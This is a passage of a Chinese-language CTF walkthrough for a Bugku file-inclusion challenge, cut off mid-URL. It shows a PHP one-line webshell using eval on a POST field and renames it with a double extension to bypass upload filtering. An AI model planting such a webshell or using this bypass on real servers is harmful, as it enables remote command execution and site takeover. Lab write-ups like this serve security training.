前言
题目分类:
CTF—Web—文件包含—11—构造访问路径+过滤php代码
一、题目描述
题目:Bugku—文件包含2
http://114.67.246.176:13862/index.php?file=hello.php
二、解题步骤
1、寻找上传点
Step1:右键源代码,发现上传页面upload.php
2、上传一句话木马
Step2:因上传文件有限制,所以将一句话木马重命名为1.php.jpg,即可绕过
一句话木马为<?php eval($_POST['cmd']);?>
上传后,提示存储路径为upload/202108010116551588.jpg
3、构造访问路径
Step3:访问http://114.67.